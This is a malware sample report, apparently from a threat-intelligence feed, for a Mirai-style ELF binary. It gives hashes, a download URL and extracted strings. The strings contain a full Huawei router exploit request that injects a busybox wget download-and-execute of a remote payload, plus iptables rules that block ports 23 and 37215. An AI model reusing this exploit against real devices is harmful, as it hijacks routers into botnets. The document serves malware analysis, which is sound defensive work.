Sample details: cefa1b0088aa8d94ca707cf44d030875 --

Hashes
MD5: cefa1b0088aa8d94ca707cf44d030875
SHA1: 229024753dbdd31a3d95f459fdefc13ad90372d1
SHA256: 810cb8ba85a423c457f97d29b1c68c54d7886d35ba67d2cc79c867a29efd3605
SSDEEP: 1536:yVAO4Qi4iWgkF9JF84tFiMQtXZK5PcijJw:yVAEQWgkF9AtX6q
Details
File Type: ELF
Yara Hits
Source
http://185.62.190.159/bins/mpsl.idopoc
Strings
		$,%$&!(
POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Content-Length: 430
Connection: keep-alive
Accept: */*
Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g okay.gorillamc.party -l /tmp/ifipoc -r /bins/mips.idopoc; /bin/busybox chmod 777 * /tmp/ifipoc; /tmp/ifipoc huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
iptables -A INPUT -p tcp --destination-port 23 -j DROP
iptables -A INPUT -p tcp --destination-port 37215 -j DROP
*+)#0+XB
M$65&6SRS=
M$65&6SRS>B
B*+)#0+b
SPQVWT
/bin/sh
/dev/null
.shstrtab
.rodata
.ctors
.dtors
.data.rel.ro
.mdebug.abi32